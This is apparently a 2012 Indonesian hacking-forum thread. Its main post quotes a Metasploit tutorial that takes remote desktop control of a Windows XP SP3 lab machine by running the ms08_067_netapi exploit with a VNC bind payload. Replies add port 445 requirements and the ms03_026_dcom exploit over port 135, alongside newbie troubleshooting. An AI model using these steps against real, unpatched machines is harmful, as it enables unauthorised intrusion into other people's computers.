[Share] Remote Windows using metasploit
#41
permisi om saya mau nanya om maaf pengguna baru hehe
gimana caranya biar kita tau di target kita itu vuln itu ada dan bisa di exploit om
maaf om pengguna baru nya pake banget

#42
Sad 
[Help]

bro,ni armitage and msf gw knp yak ?? kq tdi pas gw buka ga bisa jalan, ga bsa connect k databse,postgresql udh gw idupin trs pas passwrd autentikasiny jga slah pdhal gw ga ngubah sma skli -- sry msih pengguna baru -/\-

#43
(04-26-2012, 09:59 PM)cinta1malam Wrote: ok guys this time i will explain a simple tutorial, remote windows using metasploit...i'm use 1 komputer with OS windows XP SP3 (on VirtualBox)  and Bactrack 5 R2, sorry if this tutorial repost from other tutorial else in this forum, and apologize if my english so bad..
ip WINDOW XP SP3 = 192.168.0.124
ip BACTRACK 5 R2  =  192.168.0.100
tools                   = msfconsole

in the first time...you can look this SS, i'm using "msfconsole" for remote windows in bactrack. then type command "use exploit/windows/smb/ms08_067_netapi".

[Image: scaled.php?server=708&filename=gambar1j.jpg&res=landing]

then type command "set PAYLOAD windows/vncinjext/bind_tcp" on terminal like this

[Image: scaled.php?server=846&filename=gambar2i.jpg&res=landing]


then type "set RHOST IP_TARGET" as below

[Image: scaled.php?server=254&filename=gambar3h.jpg&res=landing]

then running expoit like this

[Image: scaled.php?server=15&filename=gambar4.jpg&res=landing]

finally, a remote dekstop using msfconsole in bactrack 5 R2 succeed.

[Image: scaled.php?server=252&filename=gambar5.jpg&res=landing]

see you next tutorial bro....Confused

ini kenapa ya bro selalu gagal ditahap exploit?
[Image: Screenshot_1.png]

#44
Makasih om infonya, ikut belajar

#45
(07-09-2012, 05:38 PM)bunglonhijau Wrote:
(05-09-2012, 07:54 PM)dance with shadow Wrote:
(05-01-2012, 05:47 PM)iyan squid Wrote:
(04-28-2012, 01:49 PM)daytch Wrote: ni bro ss ny. . .

[Image: 250rqj8.png]

[Image: 25qty8h.png]

coba di remove aja metasploitnya terus install ulang lagi , ato coba pake svn update aja dulu
maaf ni buat om semua klo sok tau..
klo kita mau ngermote itu hrus kbuka dlu ya port target..itu port 445 kn?
nah klo ga kbuka gmn?
mau nnya juga sekalian..klo port-port yg laen yg kbuka bisa ga?
makasih


bunglonhijau Wrote:tergantung jenis exploitnya,
klo pake exploit windows/smb/ms08_067_netapi, port 445 target harus terbuka, jika port 445 trttup djmin pasti ga sukses exploitnya..
klo ga kebuka coba pake exploit lain kayak windows/dcerpc/ms03_026_dcom yang nyerang melalui port 135
:apn: :apn: :apn:


ooo jadi setiap port yang terbuka memiliki jenis exploit yg berbeda ya om? kira-kira untuk melihat referensi jenis-jenis exploit itu dimana ya om? thanks udah share om Smile






Users browsing this thread: 1 Guest(s)